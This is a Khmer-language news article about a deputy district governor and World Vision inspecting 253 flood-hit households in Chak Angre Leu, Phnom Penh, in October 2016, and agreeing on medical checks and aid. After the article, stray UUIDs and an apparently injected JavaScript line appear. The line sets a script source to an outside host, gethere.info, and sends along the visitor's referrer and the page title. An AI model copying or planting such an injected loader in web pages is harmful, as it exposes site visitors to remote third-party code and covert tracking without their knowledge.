Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

លោក ឌី រត្ន័ខេមរុណ បានសហការជាមួយអង្គការទស្សនះពិភពលោក ចុះពិនិត្យផ្ទាល់ផ្ទះប្រជាពលរដ្ឋនៅតំបន់លិចទឹក ចំនួន២៥៣គ្រួសារ ក្នុងសង្កាត់ចាក់អង្រែលេី

ភ្នំពេញ៖  កាលពីយប់ថ្ងៃទី១៨ ខែតុលា ឆ្នាំ២០១៦ ក្រោយពិនិត្យស្ថានភាពទឹកជំនន់លិចផ្ទះប្រជាពលរដ្ឋក្នុងក្រុម៣ដល់ក្រុម៧ នៅភូមិព្រែកតាគង់១ សង្កាត់ចាក់អង្រែលេីរួចមក លុះព្រឹកម៉ោង៨ និង៣០ថ្ងៃទី១៩ ខែតុលា ឆ្នាំ២០១៦ លោក ឌី រត្ន័ខេមរុណ អភិបាលរងខណ្ឌមានជ័យ និង ជាប្រធានអនុសាខាកាកបាទក្រហមខណ្ឌមានជ័យ បានសហការជាមួយអង្គការទស្សនះពិភពលោក ចុះពិនិត្យផ្ទាល់ផ្ទះប្រជាពលរដ្ឋនៅតំបន់លិចទឹក ចំនួន២៥៣គ្រួសារ ក្នុងសង្កាត់ចាក់អង្រែលេី ខណ្ឌមានជ័យ ក្រោយពិនិត្យរួច ឃេីញមានកុមារអាយុក្រោម៩ឆ្នាំចុះក្រោមមាន២០ភារយនៃគ្រួសារចំនួន២៥៣គ្រួសារដែលជួបបញ្ហាសុខភាព ។ បន្ទាប់មកលោក ឌី រត្ន័ខេមរុណ អភិបាលរងខណ្ឌមានជ័យ តំណាងលោក ពេជ្រ កែវមុនី អភិបាលខណ្ឌមានជ័យ បានឯកភាពគ្នាជាមួយអង្គការទស្សនះពិភពលោក (World Vision ) ដូចជា:
រៀបចំអោយមានក្រុមគ្រូពេទ្យស្មគ្រ័ចិត្តចុះពិនិត្យសុខភាពជូនប្រជាពលរដ្ឋ២៥៣គ្រួសារ
រៀបចំអំណោយមនុស្សធម៍កាកបាទក្រហមកម្ពុជា ដោយសហការជាដៃគូនិងអំណោយរបស់អង្គការទស្សនះពិភពលោក ដេីម្បីចែកជូនប្រជាពលរដ្ឋដែលជួបការរងគ្រោះទឹកជំនន់នៅគ្រឿងឩបភោគបរិភោគ និងសំភារះសិក្សាកុមារ។
បន្ទាប់មកក្រុមការងារក៏បានចុះសំណេះសំណាលជាមួយប្រជាពលរដ្ឋពីបញ្ហាសុខភាពតាមខ្នងផ្ទះតែម្តង។

6e449823-44dd-4811-afd1-9f5b7cc9abc9 8bc2071a-3cf5-4098-8437-67be2d505bf7 41601a4a-a630-4dc6-a9f9-32a78d9d379c 43543283-217a-4fce-ac74-38a50ca3813056d48808-3f25-4e74-8f02-a6a69ccb48b0 28775fb4-d082-4813-b844-fb12d7fe17bd

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More